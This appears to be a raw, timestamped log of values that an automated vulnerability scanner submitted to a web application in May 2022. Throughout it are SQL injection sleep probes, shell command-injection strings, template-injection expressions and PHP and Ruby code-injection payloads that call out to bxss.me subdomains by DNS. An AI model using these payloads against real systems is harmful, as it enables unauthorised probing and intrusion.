KDh3uN8h';_waitfor_delay_'0:0:15'_-- 20220520073933
'.gethostbyname(lc('hittz'.'rujkfdrt6f7c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(70).chr(104).chr(88).' 20220520074603
${@print(md5(31337))}\\ 20220520081447
&echo_jclpgy$()\\_qibeqv\\nz^xyu||a_#'_&echo_jclpgy$()\\_qibeqv\\nz^xyu||a_#|\ 20220520075035
-1_OR_2_292-292-1=0_0_0_1_-- 20220520075023
echo_oowhbh$()\\_yjytpj\\nz^xyu||a_#'_&echo_oowhbh$()\\_yjytpj\\nz^xyu||a_#|\ 20220520075919
'.gethostbyname(lc('hithz'.'btsjaylv63737.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(81).chr(113).chr(70).' 20220520075044
ecZYy9r5';_waitfor_delay_'0:0:15'_-- 20220520074650
&echo_naehzu$()\\_qoyeju\\nz^xyu||a_#'_&echo_naehzu$()\\_qoyeju\\nz^xyu||a_#|\ 20220520075457
1QYar8agO 20220520074424
-1'_OR_2_782-782-1=0_0_0_1_or_'f2juy2II'=' 20220520075037
1gNsGlmLO 20220520075134
${9999448_10000147} 20220520075430
OPQnEPLU'))_OR_975=(SELECT_975_FROM_PG_SLEEP(15))-- 20220520081021
@@jPzCU 20220520074502
${9999462_9999642} 20220520075857
&echo_pyjrek$()\\_jsrsbz\\nz^xyu||a_#'_&echo_pyjrek$()\\_jsrsbz\\nz^xyu||a_#|\ 20220520074747
-1_OR_2_189-189-1=0_0_0_1 20220520075023
JUdbG6oH'))_OR_78=(SELECT_78_FROM_PG_SLEEP(15))-- 20220520075043
1_\xc0\xa7\xc0\xa2%2527%2522 20220520081548
-1'_OR_2_967-967-1=0_0_0_1_-- 20220520074445
6GRUVP0u'_OR_536=(SELECT_536_FROM_PG_SLEEP(15))-- 20220520075531
@@XJHkG 20220520075046
2uhYoWEg 20220520075917
1nzKXameO 20220520075032
S78LV05B'_OR_45=(SELECT_45_FROM_PG_SLEEP(15))-- 20220520074637
-1'_OR_2_237-237-1=0_0_0_1_or_'LcZndXML'=' 20220520074628
python-requests/2.27.1 20220531191604
dtfnmzTI'))_OR_291=(SELECT_291_FROM_PG_SLEEP(15))-- 20220520074828
'_'A'.concat(70-3).concat(22*4).concat(121).concat(89).concat(122).concat(84)_(require'socket'_Socket.gethostbyname('hitfp'_'dtmmckjweb4a8.bxss.me.')[3].to_s)_' 20220520074908
!(()&&!|*|*| 20220520081308
1Zznf7vGO 20220520075103
'.gethostbyname(lc('hitpo'.'hmdjtvnc9133a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(85).chr(113).chr(88).' 20220520074934
'.gethostbyname(lc('hitnj'.'cewblqie84e53.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(82).chr(109).chr(84).' 20220520075903
afj1eeVB')_OR_171=(SELECT_171_FROM_PG_SLEEP(15))-- 20220520075010
VYusyhR6')_OR_958=(SELECT_958_FROM_PG_SLEEP(15))-- 20220520075922
R5CfXvGm'_OR_427=(SELECT_427_FROM_PG_SLEEP(15))-- 20220520073802
'_'A'.concat(70-3).concat(22*4).concat(108).concat(75).concat(117).concat(69)_(require'socket'_Socket.gethostbyname('hitdr'_'fmitijwa91833.bxss.me.')[3].to_s)_' 20220520075056
IR3VnQDP')_OR_114=(SELECT_114_FROM_PG_SLEEP(15))-- 20220520075028
-1_OR_2_109-109-1=0_0_0_1 20220520074445
&echo_dyalcg$()\\_vckfav\\nz^xyu||a_#'_&echo_dyalcg$()\\_vckfav\\nz^xyu||a_#|\ 20220520075000
-1_OR_2_634-634-1=0_0_0_1 20220520074627
lUmDZJAB';_waitfor_delay_'0:0:15'_-- 20220520073802
'.gethostbyname(lc('hitex'.'qrutpnmvf7218.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(98).chr(77).' 20220520075535
|echo_tbtkmm$()\\_xrswez\\nz^xyu||a_#'_|echo_tbtkmm$()\\_xrswez\\nz^xyu||a_#|\ 20220520075112
-1_OR_2_122-122-1=0_0_0_1 20220520074921
echo_gkmjhy$()\\_tlxvny\\nz^xyu||a_#'_&echo_gkmjhy$()\\_tlxvny\\nz^xyu||a_#|\ 20220520074647
echo_flbuys$()\\_owpajh\\nz^xyu||a_#'_&echo_flbuys$()\\_owpajh\\nz^xyu||a_#|\ 20220520075457
&echo_nmravs$()\\_jrwfmm\\nz^xyu||a_#'_&echo_nmravs$()\\_jrwfmm\\nz^xyu||a_#|\ 20220520074620
&echo_btkfmy$()\\_hygxqk\\nz^xyu||a_#'_&echo_btkfmy$()\\_hygxqk\\nz^xyu||a_#|\ 20220520075416
|echo_ruzqaf$()\\_vlthtf\\nz^xyu||a_#'_|echo_ruzqaf$()\\_vlthtf\\nz^xyu||a_#|\ 20220520073814
1PfoTGizO 20220520075010
&echo_lbfrgc$()\\_wtypgo\\nz^xyu||a_#'_&echo_lbfrgc$()\\_wtypgo\\nz^xyu||a_#|\ 20220520081216
http://bxss.me/t/fit.txt%3F.36 20220520081324
KCOzhJxR';_waitfor_delay_'0:0:15'_-- 20220520074602
HrpQUTUe 20220520074558
Dm6D9xWu'))_OR_248=(SELECT_248_FROM_PG_SLEEP(15))-- 20220520073820
${10000400_9999177} 20220520081227
-1'_OR_2_650-650-1=0_0_0_1_-- 20220520075516
'_'A'.concat(70-3).concat(22*4).concat(110).concat(86).concat(106).concat(84)_(require'socket'_Socket.gethostbyname('hitxq'_'rvwqwyisecb63.bxss.me.')[3].to_s)_' 20220520073820
PD30HZgL 20220520073801
-1_OR_2_682-682-1=0_0_0_1 20220520073801
&echo_qkkqtw$()\\_sxxqwb\\nz^xyu||a_#'_&echo_qkkqtw$()\\_sxxqwb\\nz^xyu||a_#|\ 20220520073928
dIkMnYnZ'_OR_592=(SELECT_592_FROM_PG_SLEEP(15))-- 20220520075120
${@print(md5(31337))} 20220520081442
Y1RGZQkk';_waitfor_delay_'0:0:15'_-- 20220520073801
KqwPAsuL 20220520073817
${9999228_9999446} 20220520074831
-1'_OR_2_302-302-1=0_0_0_1_-- 20220520074758
echo_dbtnsr$()\\_ygccwb\\nz^xyu||a_#'_&echo_dbtnsr$()\\_ygccwb\\nz^xyu||a_#|\ 20220520080031
-1'_OR_2_799-799-1=0_0_0_1_-- 20220520075320
TPphAgC6';_waitfor_delay_'0:0:15'_-- 20220520081515
'.gethostbyname(lc('hithf'.'ytlsrxtd1303f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(88).chr(111).chr(65).' 20220520074841
${9999105_9999499} 20220520074955
echo_fmaqbi$()\\_ovdqsy\\nz^xyu||a_#'_&echo_fmaqbi$()\\_ovdqsy\\nz^xyu||a_#|\ 20220520074921
-1_OR_2_924-924-1=0_0_0_1_-- 20220520073801
echo_igmcwu$()\\_epwdkg\\nz^xyu||a_#'_&echo_igmcwu$()\\_epwdkg\\nz^xyu||a_#|\ 20220520074747
-1_OR_2_886-886-1=0_0_0_1 20220520074823
1vZmxNA4O 20220520074729
6VIHer1u'))_OR_974=(SELECT_974_FROM_PG_SLEEP(15))-- 20220520074926
oJTp9uRq'))_OR_685=(SELECT_685_FROM_PG_SLEEP(15))-- 20220520075120
^(#$!@#$)(()))****** 20220520081315
'_'A'.concat(70-3).concat(22*4).concat(104).concat(90).concat(106).concat(71)_(require'socket'_Socket.gethostbyname('hittw'_'elvqqhww23d49.bxss.me.')[3].to_s)_' 20220520075126
|echo_yyrfxg$()\\_thqynw\\nz^xyu||a_#'_|echo_yyrfxg$()\\_thqynw\\nz^xyu||a_#|\ 20220520074621
nHBuyUhx';_waitfor_delay_'0:0:15'_-- 20220520073804
KDJQqkit'))_OR_293=(SELECT_293_FROM_PG_SLEEP(15))-- 20220520074640
'_'A'.concat(70-3).concat(22*4).concat(103).concat(70).concat(120).concat(80)_(require'socket'_Socket.gethostbyname('hitdt'_'sjilqyxh61528.bxss.me.')[3].to_s)_' 20220520074607
BGGTfYhl'))_OR_389=(SELECT_389_FROM_PG_SLEEP(15))-- 20220520073802
-1_OR_2_262-262-1=0_0_0_1 20220520074750
-1'_OR_2_690-690-1=0_0_0_1_-- 20220520074751
-1_OR_2_990-990-1=0_0_0_1_-- 20220520075831
NlhqADBl'))_OR_741=(SELECT_741_FROM_PG_SLEEP(15))-- 20220520075408
rXPb59PB')_OR_359=(SELECT_359_FROM_PG_SLEEP(15))-- 20220520075430
Http://bxss.me/t/fit.txt 20220520081320
UNKNVkZo'))_OR_808=(SELECT_808_FROM_PG_SLEEP(15))-- 20220520075834
-1_OR_2_43-43-1=0_0_0_1 20220520074531
${9999943_9999709} 20220520073933
l9tcpid/v1.1.0 20220531011837
-1_OR_2_461-461-1=0_0_0_1_-- 20220520074647
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.36 20220520081310
echo_gnambv$()\\_hltxme\\nz^xyu||a_#'_&echo_gnambv$()\\_hltxme\\nz^xyu||a_#|\ 20220520075527
python-requests/2.22.0 20220523132759
xCZWZmLC'))_OR_650=(SELECT_650_FROM_PG_SLEEP(15))-- 20220520075028
-1_OR_2_804-804-1=0_0_0_1_-- 20220520074530
-1_OR_2_466-466-1=0_0_0_1_-- 20220520075514
'_'A'.concat(70-3).concat(22*4).concat(112).concat(72).concat(111).concat(85)_(require'socket'_Socket.gethostbyname('hitkw'_'cebosoiq78f7b.bxss.me.')[3].to_s)_' 20220520075513
'.gethostbyname(lc('hitpd'.'zdscubbf406e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(89).chr(99).chr(74).' 20220520074958
1Ios2VXaO 20220520075946
1BY3nLYAO 20220520073758
'.gethostbyname(lc('hitso'.'jsmshpjp7b112.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(81).chr(108).chr(90).' 20220520074022
FxYOj3nh'))_OR_920=(SELECT_920_FROM_PG_SLEEP(15))-- 20220520075923
&echo_assqus$()\\_xkarfk\\nz^xyu||a_#'_&echo_assqus$()\\_xkarfk\\nz^xyu||a_#|\ 20220520075014
-1'_OR_2_286-286-1=0_0_0_1_-- 20220520074823
-1'_OR_2_859-859-1=0_0_0_1_or_'TcMmb0uk'=' 20220520074648
BWOO7Zqk'_OR_404=(SELECT_404_FROM_PG_SLEEP(15))-- 20220520075401
-1'_OR_2_518-518-1=0_0_0_1_-- 20220520073801
${9999317_10000339} 20220520074903
'.gethostbyname(lc('hitzp'.'pacvrjmfc8615.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(87).chr(99).chr(87).' 20220520074453
XomOqMPS'))_OR_819=(SELECT_819_FROM_PG_SLEEP(15))-- 20220520075532
${9999447_10000192} 20220520074551
-1_OR_2_964-964-1=0_0_0_1 20220520073818
|echo_inlxee$()\\_xsivwo\\nz^xyu||a_#'_|echo_inlxee$()\\_xsivwo\\nz^xyu||a_#|\ 20220520074924
-1'_OR_2_173-173-1=0_0_0_1_-- 20220520073931
LOWOnBsg';_waitfor_delay_'0:0:15'_-- 20220520075042
@@wjTDn 20220520073821
|echo_lnxxhv$()\\_sbnsld\\nz^xyu||a_#'_|echo_lnxxhv$()\\_sbnsld\\nz^xyu||a_#|\ 20220520074550
'_'A'.concat(70-3).concat(22*4).concat(105).concat(67).concat(108).concat(70)_(require'socket'_Socket.gethostbyname('hitil'_'ohxraxmk825f2.bxss.me.')[3].to_s)_' 20220520075324
-1_OR_2_360-360-1=0_0_0_1 20220520075515
${9999972_9999400} 20220520075528
1hPPrNxx';_waitfor_delay_'0:0:15'_-- 20220520075009
-1\ 20220520081420
-1_OR_2_740-740-1=0_0_0_1 20220520073801
Am6ZJNub';_waitfor_delay_'0:0:15'_-- 20220520075833
uNOKpYK1';_waitfor_delay_'0:0:15'_-- 20220520075602
'_'A'.concat(70-3).concat(22*4).concat(100).concat(89).concat(100).concat(78)_(require'socket'_Socket.gethostbyname('hitxj'_'mgqeuzrf9b490.bxss.me.')[3].to_s)_' 20220520074638
mXNrLFC2')_OR_820=(SELECT_820_FROM_PG_SLEEP(15))-- 20220520073801
${10000354_9999173} 20220520073908
jSJKLT2q 20220520075114
'.gethostbyname(lc('hitgb'.'nrflbvlh5451e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(80).chr(119).chr(75).' 20220520075230
'.gethostbyname(lc('hitsb'.'mjghzphea75b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(76).chr(106).chr(89).' 20220520075026
${10000469_9999950} 20220520074519
echo_ntmhrt$()\\_xrobzg\\nz^xyu||a_#'_&echo_ntmhrt$()\\_xrobzg\\nz^xyu||a_#|\ 20220520073814
aOF55g2N')_OR_696=(SELECT_696_FROM_PG_SLEEP(15))-- 20220520074541
lEyBrL4a')_OR_463=(SELECT_463_FROM_PG_SLEEP(15))-- 20220520075524
AFE3KYv0'))_OR_954=(SELECT_954_FROM_PG_SLEEP(15))-- 20220520074459
-1'_OR_2_366-366-1=0_0_0_1_or_'S2JqcqrU'=' 20220520073801
'_'A'.concat(70-3).concat(22*4).concat(111).concat(77).concat(118).concat(73)_(require'socket'_Socket.gethostbyname('hitat'_'frqayuvm642f0.bxss.me.')[3].to_s)_' 20220520074029
FR9J4PVL')_OR_959=(SELECT_959_FROM_PG_SLEEP(15))-- 20220520074827
echo_qfczue$()\\_jhzutd\\nz^xyu||a_#'_&echo_qfczue$()\\_jhzutd\\nz^xyu||a_#|\ 20220520075600
-1'_OR_2_173-173-1=0_0_0_1_or_'bBvs8tKi'=' 20220520075004
-1_OR_2_509-509-1=0_0_0_1_-- 20220520075311
PXttEdnZ'))_OR_600=(SELECT_600_FROM_PG_SLEEP(15))-- 20220520075524
1psDzGaYO 20220520073925
${10000427_9999969} 20220520074751
MCig8zc4'_OR_162=(SELECT_162_FROM_PG_SLEEP(15))-- 20220520074456
R52O9e0b'_OR_798=(SELECT_798_FROM_PG_SLEEP(15))-- 20220520075523
'_'A'.concat(70-3).concat(22*4).concat(116).concat(79).concat(115).concat(67)_(require'socket'_Socket.gethostbyname('hittt'_'xkogtudi9c542.bxss.me.')[3].to_s)_' 20220520075442
O3Uci4Dn';_waitfor_delay_'0:0:15'_-- 20220520074925
-1'_OR_2_304-304-1=0_0_0_1_-- 20220520081412
-1_OR_2_119-119-1=0_0_0_1_-- 20220520074559
XyaJ1VAA'_OR_646=(SELECT_646_FROM_PG_SLEEP(15))-- 20220520081522
echo_jwpbmj$()\\_qzuctl\\nz^xyu||a_#'_&echo_jwpbmj$()\\_qzuctl\\nz^xyu||a_#|\ 20220520075014
|echo_lzoxex$()\\_dvktlz\\nz^xyu||a_#'_|echo_lzoxex$()\\_dvktlz\\nz^xyu||a_#|\ 20220520075457
&echo_kbqctn$()\\_hmkecz\\nz^xyu||a_#'_&echo_kbqctn$()\\_hmkecz\\nz^xyu||a_#|\ 20220520074550
GxXcImWJ')_OR_422=(SELECT_422_FROM_PG_SLEEP(15))-- 20220520075405
NZvwMvID 20220520081357
-1'_OR_2_401-401-1=0_0_0_1_-- 20220520075832
echo_kfacas$()\\_uihohw\\nz^xyu||a_#'_&echo_kfacas$()\\_uihohw\\nz^xyu||a_#|\ 20220520075035
-1_OR_2_859-859-1=0_0_0_1_-- 20220520075421
${10000436_9999880} 20220520075457
'.gethostbyname(lc('hitbh'.'aomxcrbr6f19c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(82).chr(113).chr(81).' 20220520075609
-1'_OR_2_361-361-1=0_0_0_1_-- 20220520075600
OTVoqaqJ'))_OR_132=(SELECT_132_FROM_PG_SLEEP(15))-- 20220520073805
haPJvGJw')_OR_891=(SELECT_891_FROM_PG_SLEEP(15))-- 20220520073805
1_waitfor_delay_'0:0:15'_-- 20220520081501
'.gethostbyname(lc('hitko'.'otoxvntl8328b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(90).chr(114).chr(86).' 20220520074634
lAqBXIDe 20220520080137
gKAdGhdA'))_OR_329=(SELECT_329_FROM_PG_SLEEP(15))-- 20220520075430
|echo_uyplnp$()\\_bebmcd\\nz^xyu||a_#'_|echo_uyplnp$()\\_bebmcd\\nz^xyu||a_#|\ 20220520074748
(select(0)from(select(sleep(15)))v)/*'_(select(0)from(select(sleep(15)))v)_'\ 20220520081451
zK5VXrAJ')_OR_193=(SELECT_193_FROM_PG_SLEEP(15))-- 20220520075043
&echo_cdcnri$()\\_lcmhte\\nz^xyu||a_#'_&echo_cdcnri$()\\_lcmhte\\nz^xyu||a_#|\ 20220520073900
1a2t4K64O 20220520075447
';print(md5(31337));$a=' 20220520081433
2stqMYjm'))_OR_852=(SELECT_852_FROM_PG_SLEEP(15))-- 20220520073934
|echo_nrobdj$()\\_jwgoqi\\nz^xyu||a_#'_|echo_nrobdj$()\\_jwgoqi\\nz^xyu||a_#|\ 20220520075035
@@2pjTE 20220520075030
-1'_OR_2_365-365-1=0_0_0_1_or_'lpkT3YDw'=' 20220520073818
cbBIumLb';_waitfor_delay_'0:0:15'_-- 20220520075531
|echo_aocwtu$()\\_uudqcv\\nz^xyu||a_#'_|echo_aocwtu$()\\_uudqcv\\nz^xyu||a_#|\ 20220520074515
W3BxQBNM';_waitfor_delay_'0:0:15'_-- 20220520074753
'_'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(121).concat(85)_(require'socket'_Socket.gethostbyname('hitau'_'crcbzruda99a3.bxss.me.')[3].to_s)_' 20220520075002
EqTzDo0i')_OR_684=(SELECT_684_FROM_PG_SLEEP(15))-- 20220520075532
Svq6UDI5')_OR_628=(SELECT_628_FROM_PG_SLEEP(15))-- 20220520081525
chF1Ta7S';_waitfor_delay_'0:0:15'_-- 20220520074541
'_'A'.concat(70-3).concat(22*4).concat(107).concat(87).concat(101).concat(73)_(require'socket'_Socket.gethostbyname('hituv'_'spixrjwxbe4cb.bxss.me.')[3].to_s)_' 20220520074705
&echo_hyvvuk$()\\_rtimoi\\nz^xyu||a_#'_&echo_hyvvuk$()\\_rtimoi\\nz^xyu||a_#|\ 20220520073953
-1'_OR_2_464-464-1=0_0_0_1_-- 20220520080150
QDvysxmz'_OR_772=(SELECT_772_FROM_PG_SLEEP(15))-- 20220520075027
'.gethostbyname(lc('hityf'.'tqfbspkc1b831.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(69).chr(112).chr(68).' 20220520075118
jihFzCHz')_OR_891=(SELECT_891_FROM_PG_SLEEP(15))-- 20220520075834
1some_inexistent_file_with_long_name%00.36 20220520081316
'.gethostbyname(lc('hitex'.'tqmbshgi835b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(77).chr(120).chr(84).' 20220520074003
@@SUr6T 20220520074830
-1'_OR_2_861-861-1=0_0_0_1_-- 20220520073803
&echo_jduhab$()\\_eofrae\\nz^xyu||a_#'_&echo_jduhab$()\\_eofrae\\nz^xyu||a_#|\ 20220520080718
-1'_OR_2_144-144-1=0_0_0_1_or_'IeFqZEDO'=' 20220520075518
echo_ozaquf$()\\_aasmxj\\nz^xyu||a_#'_&echo_ozaquf$()\\_aasmxj\\nz^xyu||a_#|\ 20220520073859
-1_OR_2_835-835-1=0_0_0_1_-- 20220520074753
-1'_OR_2_285-285-1=0_0_0_1_-- 20220520074534
-1'_OR_2_991-991-1=0_0_0_1_or_'mqR51dTN'=' 20220520075422
b6b5CnCS')_OR_417=(SELECT_417_FROM_PG_SLEEP(15))-- 20220520074754
|echo_seowiu$()\\_kdfkad\\nz^xyu||a_#'_|echo_seowiu$()\\_kdfkad\\nz^xyu||a_#|\ 20220520074827
bxss.me/t/xss.html?%00 20220520081428
&echo_luvgnl$()\\_nipfxs\\nz^xyu||a_#'_&echo_luvgnl$()\\_nipfxs\\nz^xyu||a_#|\ 20220520074735
echo_aivoor$()\\_fxufkx\\nz^xyu||a_#'_&echo_aivoor$()\\_fxufkx\\nz^xyu||a_#|\ 20220520075416
ffCLptzd 20220520074822
ESVQqTDn 20220520075023
echo_cmfahb$()\\_hhjdwa\\nz^xyu||a_#'_&echo_cmfahb$()\\_hhjdwa\\nz^xyu||a_#|\ 20220520074549
-1'_OR_2_123-123-1=0_0_0_1_or_'k49YTxzN'=' 20220520075832
-1_OR_2_177-177-1=0_0_0_1_-- 20220520074626
-1'_OR_2_517-517-1=0_0_0_1_-- 20220520073818
-1_OR_2_294-294-1=0_0_0_1_-- 20220520075114
RCzzCr0O')_OR_77=(SELECT_77_FROM_PG_SLEEP(15))-- 20220520074801
1'\ 20220520081544
1mlqve5eO 20220520074912
&echo_yxnvrr$()\\_dafndi\\nz^xyu||a_#'_&echo_yxnvrr$()\\_dafndi\\nz^xyu||a_#|\ 20220520074016
'.gethostbyname(lc('hitfm'.'ulcxajjvd14f1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(87).chr(114).chr(76).' 20220520081315
@@KTkwR 20220520073935
@@7tzDP 20220520081557
2hMJArQj')_OR_81=(SELECT_81_FROM_PG_SLEEP(15))-- 20220520073820
${9999246_9999090} 20220520075207
|echo_vpgalj$()\\_conutt\\nz^xyu||a_#'_|echo_vpgalj$()\\_conutt\\nz^xyu||a_#|\ 20220520075602
@@6kgpU 20220520073805
8yostcKP 20220520074530
-1'_OR_2_742-742-1=0_0_0_1_or_'gKljIbcF'=' 20220520074759
@@NcX0H 20220520075924
@@tT8VC 20220520075835
|echo_srjqdq$()\\_vifsiw\\nz^xyu||a_#'_|echo_srjqdq$()\\_vifsiw\\nz^xyu||a_#|\ 20220520075417
-1'_OR_2_151-151-1=0_0_0_1_or_'wEOR3y0F'=' 20220520075324
-1_OR_2_600-600-1=0_0_0_1 20220520075002
12345'\ 20220520081212
-1_OR_2_69-69-1=0_0_0_1_-- 20220520073800
04dLtLGG';_waitfor_delay_'0:0:15'_-- 20220520075522
QKrG3KyX';_waitfor_delay_'0:0:15'_-- 20220520075429
@@l9wg2 20220520075606
|echo_zbrpid$()\\_pidpan\\nz^xyu||a_#'_|echo_zbrpid$()\\_pidpan\\nz^xyu||a_#|\ 20220520080038
|echo_pjxwbb$()\\_xoipge\\nz^xyu||a_#'_|echo_pjxwbb$()\\_xoipge\\nz^xyu||a_#|\ 20220520073929
B38UzJEL'))_OR_332=(SELECT_332_FROM_PG_SLEEP(15))-- 20220520074754
${9999171_10000264} 20220520074019
-1'_OR_2_454-454-1=0_0_0_1_or_'2803hc9M'=' 20220520081417
-1_OR_2_156-156-1=0_0_0_1_-- 20220520075559
1yHIrkSYO 20220520074729
QWpPt1CB'_OR_270=(SELECT_270_FROM_PG_SLEEP(15))-- 20220520074926
CBBWln3T')_OR_399=(SELECT_399_FROM_PG_SLEEP(15))-- 20220520073802
dtB6EuBm';_waitfor_delay_'0:0:15'_-- 20220520080946
P4pF7X4c 20220520075527
-1'_OR_2_956-956-1=0_0_0_1_or_'f7TU4cF8'=' 20220520075919
DkCBxMpa'))_OR_750=(SELECT_750_FROM_PG_SLEEP(15))-- 20220520073802
-1_OR_2_550-550-1=0_0_0_1 20220520074754
-1_OR_2_879-879-1=0_0_0_1 20220520075421
-1_OR_2_606-606-1=0_0_0_1 20220520081408
-1_OR_2_173-173-1=0_0_0_1 20220520075316
-1_OR_2_374-374-1=0_0_0_1_-- 20220520074444
r8adW0QI'_OR_666=(SELECT_666_FROM_PG_SLEEP(15))-- 20220520074541
bs2zGtVT';_waitfor_delay_'0:0:15'_-- 20220520075921
-1'_OR_2_172-172-1=0_0_0_1_-- 20220520075918
1M7dRyzYO 20220520074538
BBJdJfhm';_waitfor_delay_'0:0:15'_-- 20220520074455
|echo_gethdi$()\\_jqlnjc\\nz^xyu||a_#'_|echo_gethdi$()\\_jqlnjc\\nz^xyu||a_#|\ 20220520073954
1TIENYNIO 20220520081119
-1'_OR_2_606-606-1=0_0_0_1_-- 20220520075037
@@V7nbX 20220520075431
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 20220520081436
-1'_OR_2_349-349-1=0_0_0_1_or_'sUaL9fb0'=' 20220520073803
5SchxmkV'_OR_740=(SELECT_740_FROM_PG_SLEEP(15))-- 20220520080954
IbjYNr2O')_OR_594=(SELECT_594_FROM_PG_SLEEP(15))-- 20220520073934
echo_ifisuw$()\\_syfqvh\\nz^xyu||a_#'_&echo_ifisuw$()\\_syfqvh\\nz^xyu||a_#|\ 20220520075000
-1'_OR_2_21-21-1=0_0_0_1_-- 20220520075116
-1_OR_2_677-677-1=0_0_0_1_-- 20220520081406
4UJ2peP0';_waitfor_delay_'0:0:15'_-- 20220520074827
|echo_ichgqn$()\\_pgtpia\\nz^xyu||a_#'_|echo_ichgqn$()\\_pgtpia\\nz^xyu||a_#|\ 20220520075919
|echo_hwmodk$()\\_lacjzh\\nz^xyu||a_#'_|echo_hwmodk$()\\_lacjzh\\nz^xyu||a_#|\ 20220520080721
-1_OR_2_684-684-1=0_0_0_1_-- 20220520073817
'_'A'.concat(70-3).concat(22*4).concat(110).concat(81).concat(120).concat(85)_(require'socket'_Socket.gethostbyname('hitck'_'qkfioaykcc36b.bxss.me.')[3].to_s)_' 20220520073918
-1_OR_2_444-444-1=0_0_0_1 20220520075528
'.gethostbyname(lc('hittv'.'lxjcpudocd5be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(82).chr(117).chr(84).' 20220520080822
TuDRhMf2 20220520075036
1VA08g7iO 20220520074816
-1'_OR_2_84-84-1=0_0_0_1_or_'ZYdyALRl'=' 20220520074447
-1_OR_2_722-722-1=0_0_0_1 20220520073803
echo_ptmzee$()\\_tkohnk\\nz^xyu||a_#'_&echo_ptmzee$()\\_tkohnk\\nz^xyu||a_#|\ 20220520073928
-1'_OR_2_708-708-1=0_0_0_1_or_'2oGG64Bv'=' 20220520074536
Ez5crtGi';_waitfor_delay_'0:0:15'_-- 20220520075027
v2Ni0qVn'_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520073801
'.gethostbyname(lc('hitph'.'qlnnitbv846c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(83).chr(112).chr(85).' 20220520074528
@@meGjk 20220520075420
@@GPkrA 20220520081043
-1_OR_2_331-331-1=0_0_0_1_-- 20220520074823
|echo_wyelxj$()\\_ydijtp\\nz^xyu||a_#'_|echo_wyelxj$()\\_ydijtp\\nz^xyu||a_#|\ 20220520075529
1MxFtnXrO 20220520073812
echo_uvqplr$()\\_pgazlj\\nz^xyu||a_#'_&echo_uvqplr$()\\_pgazlj\\nz^xyu||a_#|\ 20220520074432
@@y8iFy 20220520080300
\ 20220520081449
'_'A'.concat(70-3).concat(22*4).concat(103).concat(66).concat(97).concat(83)_(require'socket'_Socket.gethostbyname('hitvv'_'ywukmqqk12f47.bxss.me.')[3].to_s)_' 20220520074853
echo_vqpbqy$()\\_njyeij\\nz^xyu||a_#'_&echo_vqpbqy$()\\_njyeij\\nz^xyu||a_#|\ 20220520080715
xhju6lkS 20220520073800
'_'A'.concat(70-3).concat(22*4).concat(108).concat(68).concat(99).concat(67)_(require'socket'_Socket.gethostbyname('hitcz'_'cvrfewpzc460a.bxss.me.')[3].to_s)_' 20220520080200
1v5pxVrpO 20220520080636
Yd0y2Bns')_OR_159=(SELECT_159_FROM_PG_SLEEP(15))-- 20220520075603
-1_OR_2_920-920-1=0_0_0_1 20220520075037
-1'_OR_2_479-479-1=0_0_0_1_-- 20220520074627
'.gethostbyname(lc('hitpp'.'ihhjmhom7d926.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(82).chr(112).chr(90).' 20220520074804
-1_OR_2_400-400-1=0_0_0_1 20220520080839
${9999853_10000108} 20220520075023
|echo_zfwsbe$()\\_xpjoxz\\nz^xyu||a_#'_|echo_zfwsbe$()\\_xpjoxz\\nz^xyu||a_#|\ 20220520075211
-1_OR_2_710-710-1=0_0_0_1_-- 20220520074920
echo_dzjcrw$()\\_osmvyy\\nz^xyu||a_#'_&echo_dzjcrw$()\\_osmvyy\\nz^xyu||a_#|\ 20220520075112
'_'A'.concat(70-3).concat(22*4).concat(105).concat(82).concat(112).concat(79)_(require'socket'_Socket.gethostbyname('hitfi'_'hxmfhmnm95e07.bxss.me.')[3].to_s)_' 20220520074532
${9999780_9999593} 20220520080027
&echo_artvpd$()\\_bcayrr\\nz^xyu||a_#'_&echo_artvpd$()\\_bcayrr\\nz^xyu||a_#|\ 20220520074647
-1'_OR_2_709-709-1=0_0_0_1_or_'FBx4khdD'=' 20220520080153
@@ulwQy 20220520074927
|echo_elbvof$()\\_fhstpe\\nz^xyu||a_#'_|echo_elbvof$()\\_fhstpe\\nz^xyu||a_#|\ 20220520074736
-1'_OR_2_662-662-1=0_0_0_1_or_'T3B2YNIF'=' 20220520075528
&echo_peaphu$()\\_gecwpa\\nz^xyu||a_#'_&echo_peaphu$()\\_gecwpa\\nz^xyu||a_#|\ 20220520073814
|echo_mptoug$()\\_kqaaqa\\nz^xyu||a_#'_|echo_mptoug$()\\_kqaaqa\\nz^xyu||a_#|\ 20220520075015
'_'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(98).concat(84)_(require'socket'_Socket.gethostbyname('hitma'_'vvkvvgtp65691.bxss.me.')[3].to_s)_' 20220520081028
@@bMKB7 20220520075533
SaEHkjnl'_OR_268=(SELECT_268_FROM_PG_SLEEP(15))-- 20220520074800
7e7munBE')_OR_354=(SELECT_354_FROM_PG_SLEEP(15))-- 20220520075120
hD4tTpu0 20220520074647
-1'_OR_2_172-172-1=0_0_0_1_or_'5P0CpvaT'=' 20220520074921
ELv3TlqY'))_OR_18=(SELECT_18_FROM_PG_SLEEP(15))-- 20220520080241
zG4isY1b'_OR_473=(SELECT_473_FROM_PG_SLEEP(15))-- 20220520075010
bxss.me 20220520081327
1cvoHNcIO 20220520075847
